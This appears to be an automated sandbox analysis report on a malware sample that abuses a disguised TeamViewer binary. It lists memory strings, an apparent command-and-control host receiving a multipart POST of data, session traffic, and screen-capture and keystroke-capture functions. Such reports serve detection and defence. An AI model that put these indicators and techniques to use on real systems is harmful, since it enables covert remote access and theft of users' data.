Source: UniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmp String found in binary or memory: http://crl.verisign.corl0
Source: wogZe27GBB.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wogZe27GBB.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: wogZe27GBB.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: wogZe27GBB.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wogZe27GBB.exe String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://go.teamviewer.comn0
Source: UniPrint.exe, 00000005.00000003.710224733.00000000057D9000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001;
Source: UniPrint.exe, 00000005.00000003.709879277.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001ndows.Phot
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001s
Source: UniPrint.exe, 00000005.00000002.1073157453.0000000000B65000.00000004.00000020.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002u
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=100000026
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.710194245.00000000057D4000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=100000023v
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713534320.0000000005721000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002321935-2125563209-405306
Source: UniPrint.exe, 00000005.00000002.1073179417.0000000000B68000.00000004.00000020.sdmp String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5Mko
Source: UniPrint.exe, 00000005.00000002.1073127658.0000000000B5D000.00000004.00000020.sdmp String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6s
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713565888.000000000576A000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713161991.00000000057D0000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeq
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://mastr13.teamv
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://mastr13.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=2
Source: wogZe27GBB.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: wogZe27GBB.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wogZe27GBB.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: wogZe27GBB.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: wogZe27GBB.exe String found in binary or memory: http://ocsp.sectigo.com0
Source: UniPrint.exe, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.TeamViewer.com
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.TeamViewer.com#http://www.TeamViewer.com/licensing
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.TeamViewer.com/download
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.TeamViewer.com/help
Source: wogZe27GBB.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
Source: nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/company/index.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp String found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000010.00000003.794457434.00000217C6F81000.00000004.00000001.sdmp String found in binary or memory: https://displaycatalog.m(
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: wogZe27GBB.exe String found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/8C631A8/ELBASE.dll.mui01
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/(c~
Source: UniPrint.exe, 00000005.00000003.855571733.00000000057D3000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/.i
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/8
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/B
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/ELBASE.dll.mui01
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/TTP-Out)LMEMX
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/qWave
Source: wogZe27GBB.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000002.1073981229.0000000002740000.00000004.00000001.sdmp String found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: svchost.exe, 00000010.00000003.797707479.00000217C6FB0000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.797621613.00000217C6F5E000.00000004.00000001.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: UniPrint.exe, 00000005.00000002.1072984731.0000000000B00000.00000004.00000020.sdmp String found in binary or memory: https://www.verisign.c
Source: unknown HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85991Content-Type: multipart/form-data; boundary=--------988836371User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C5900 GetProcessHeap,GetProcessHeap,HeapAlloc,HttpQueryInfoW,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,RtlMoveMemory,InternetReadFile,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 3_2_6E5C5900
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047145&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047152&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047159&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047224&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=12251267&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.4:49767 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C6B70 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectW,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC, 3_2_6E5C6B70
Creates a DirectInput object (often for capturing keystrokes)
